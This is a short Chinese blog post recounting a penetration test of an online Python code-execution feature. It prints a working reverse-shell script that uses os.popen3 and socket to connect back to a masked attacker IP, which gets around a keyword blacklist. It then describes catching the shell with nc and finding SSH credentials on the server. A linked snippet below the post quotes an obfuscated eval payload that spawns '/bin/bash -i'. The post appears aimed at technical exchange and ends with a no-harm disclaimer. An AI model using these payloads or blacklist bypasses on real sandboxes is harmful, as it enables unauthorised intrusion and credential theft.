Python在线编码导致命令执行

最新推荐文章于 2024-06-26 22:33:21 发布

Xyntax

最新推荐文章于 2024-06-26 22:33:21 发布

阅读量704

点赞数

分类专栏：渗透测试 Python 文章标签： python socket 编码 shell 命令执行

本文链接：https://blog.csdn.net/cd_xuyue/article/details/51763901

版权

渗透测试同时被 2 个专栏收录

33 篇文章 1 订阅

订阅专栏

Python

10 篇文章 0 订阅

订阅专栏

看到某公众号提供＂Python在线编写＂功能，测试了几个函数．
以下常规的都被过滤了

os.system
os.popen
subprocess
commands

然后试试os.popen2/3/4发现可以import，同时socket也可以使用

这样就写了个反弹shell的脚本：

import socket
from os import popen3

s = socket.socket()
s.connect(('xx.xx.xx.xx', 12345))

for i in range(10000):
    ans = popen3(s.recv(1024))
    s.send(ans[1].read() + ans[2].read())

敲进去

这里写图片描述

这边用nc监听，拿到shell

这里写图片描述

发现敏感文件，验证了一下是ssh的密码，登入之后就可以执行交互式的命令了

帐号权限比较低，不过还是有些信息泄漏
这里写图片描述

看到服务器的源码，针对用户输入采用黑名单过滤．这样的in判断直接编码一下就能绕过，而且黑名单基本不可能覆盖全面．

这里写图片描述

该测试未影响系统服务的正常运行，未修改及泄漏任何系统数据，仅供技术交流．

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Xyntax

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

xy 编程序列代码_Python在线编程导致命令执行（二）

weixin_39880666的博客

12-20

146

测试仍以黑名单形式过滤关键字。且只过滤用户输入，并未影响到运行时。方案复活eval/exec函数通过eval执行简单混淆过的payload躲避黑名单通过os.popen拿到shell方法1：复活evalpocexpa = 'e' + 'val'p = 'po' + 'pen'payload = '__import__("os").' + p + '("/bin/bash -i >& ...

python在线命令行_从命令行传递列表到Python

weixin_39614561的博客

11-29

303

I would like to make my python script run from the command line when supplies with some arguments. However, one of the arguments should be a list of options specific to one segment of the script. Woul...

参与评论您还未登录，请先登录后发表或查看评论

Python终于可以在线编程了！

最新发布

相信相信的力量

06-26

1342

优势在线编程，轻量级，无需安装Python环境。在线编程优势：无需安装和配置环境:在线编程平台不需要用户在本地安装任何软件或配置开发环境。这对初学者和那些希望快速上手进行编程的人非常有利。跨平台兼容性:这些平台可以在任何具有互联网连接的设备上使用，包括PC、平板和手机，用户可以随时随地编写和运行代码。实时协作:多数在线编程平台支持实时协作编程，允许多个用户同时编辑同一个项目。这对团队开发和编程教学...

在线运行python语句_代码在线运行工具

weixin_30568317的博客

01-14

1441

author：zbseoag仅限于本地使用,不要放在服务器上**/error_reporting(E_ALL);date_default_timezone_set('Asia/Shanghai');if (!empty($_REQUEST)){(new Tool($_REQUEST['data']))->{$_REQUEST['action']}();exit;}?>我的工具包* {p...

Python如何执行系统命令

12-16

1. `subprocess.run(command, shell=False, stdout=None, stderr=None, ...)` 是`subprocess`模块中推荐的接口，它简化了命令执行的过程。`shell=False`表示命令是一个列表，`shell=True`表示命令是一个字符串，会...

python 采用paramiko 远程执行命令及报错解决

09-18

错误处理不仅限于连接失败的处理，还包括在命令执行完毕后关闭SSH连接，避免资源泄露。通过定义close方法来确保SSH连接被正确关闭是一个良好的编程习惯。需要注意的是，在实际使用paramiko进行远程执行命令时，...

python调用adb shell命令_如何在python脚本里面连续执行adb shell后面的各种命令

weixin_39910963的博客

12-04

1882

如何在python脚本里面连续执行adb shell后面的各种命令adb shell "cd /data/local && mkdir tmp"adb shell mv /data/local/tmp /data/local/tmp.bakadb shell ln -s /data /data/local/tmpadb reboot adb wait-for-deviceadb s...

python3调用windows dos命令的例子

09-18

为了解决这个问题，可以在程序开始时使用`chcp 936`命令将代码页切换回GBK，以确保命令执行时的编码匹配。在提供的代码示例中，定义了一个名为`copyFile`的函数，用于将源文件或目录复制到目标位置。这在同步本地...

Python 查看文件的编码格式方法

09-20

### Python 查看文件的编码格式方法在处理文本文件时，了解文件的编码格式是非常重要的。这不仅能帮助我们正确地读取文件内容，还能避免因编码不匹配导致的数据损坏或乱码问题。本文将详细介绍如何使用Python来...

樂小伍

03-21

5141

请注意，这些平台的功能和特性可能会有所不同，用户可以根据自己的需求选择适合自己的平台。同时，使用这些平台时，建议注意保护自己的代码和数据安全，避免在平台上存储敏感信息。

[python]subprocess与pyqt4结合使用以及编码问题

Baxter的笔记(๑ŐдŐ)b

10-03

1263

国庆在家无聊(感觉有点略惨啊...

python编程第三站-在线密码破解工具

流浪法师的博客

05-10

2614

python编程第三站-在线密码破解工具

将python3中os.popen()的默认编码由ascii修改为utf-8

识途老码

04-17

1021

如何将python3中os.popen()的默认编码由ascii修改为utf-8

python 小知识之获得及设置当前路径、os.popen gbk编码问题

清流弯弯

06-07

403

尤其是cmd定位到这里运行时，会发现可能py在d盘，但得到的路径确在C盘。同时，又希望将py所在路径设置为当前路径的话，可以重新设置。解决方法：用subprocess 替代。bat 调用py文件时，出现。定位这个函数的编码问题，

tableau中文版教程pdf_PDF 文件

weixin_39986973的博客

12-19

1528

本文介绍如何将 Tableau 连接到 .pdf 文件数据并设置数据源。注意：Tableau 不支持从右到左 (RTL) 的语言。如果您的 PDF 包含 RTL 文本，则字符可能会以相反顺序显示在 Tableau 中。进行连接并扫描文档表格打开 Tableau 后，在“连接”下面，单击“PDF 文件”。选择要连接到的文件，然后单击“打开”。在“扫描 PDF 文件”对话框中，指定想要 Tableau...

PYC-在线反编译器、隐写工具Stegosaurus

sinat_31884905的博客

03-10

3890

http://www.freebuf.com/sectool/129357.html Stegosaurus 本文将给大家介绍这款名叫Stegosaurus的隐写工具，它允许我们在Python字节码文件（pyc或pyo）中嵌入任意Payload。由于编码密度较低，因此我们嵌入Payload的过程既不会改变源代码的运行行为，也不会改变源文件的文件大小。Payload代码会被分散嵌入到字节码之中，所以类似strings这样的代码工具无法查找到实际的Payload。 PYC-在线反编译器、隐写工具、还有一种情

python语言只能以程序方式执行_让Python语言程序在线执行

weixin_39788382的博客

11-29

294

本文主要向大家介绍了让Python语言程序在线执行，通过具体的内容向大家展示，希望对大家学习Python语言有所帮助。用python编程是我最幸福的时刻，相信有过python编程经验的童鞋都有体会。没有过多的束缚，没有过多的技巧，即使只用最平实的代码也依然能完成想要的功能。如果可以，我真希望这辈子只用python和c编程。长久以来native应用为了能将新版本推送给用户，都是采用自动更新的方案。后...

Python3执行外部命令与获取输出详解

请注意，通过shell执行命令可能会引入安全风险，因为它允许shell语法，可能导致命令注入攻击。因此，除非必要，应尽量避免使用`shell=True`。这本书《Python Cookbook》第3版由David Beazley和Brian K. Jones撰写...